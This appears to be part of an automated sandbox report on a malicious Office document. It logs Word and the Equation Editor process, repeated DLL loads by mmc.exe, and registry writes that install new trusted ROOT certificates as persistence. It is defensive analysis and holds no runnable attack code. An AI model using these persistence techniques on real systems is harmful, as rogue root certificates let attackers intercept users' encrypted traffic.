Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\taskmgr.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\taskmgr.exe

Window detected: Number of UI elements: 25

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_009201F4 push eax; retf		2_2_009201F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0091C820 push eax; retf		2_2_0091C821

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
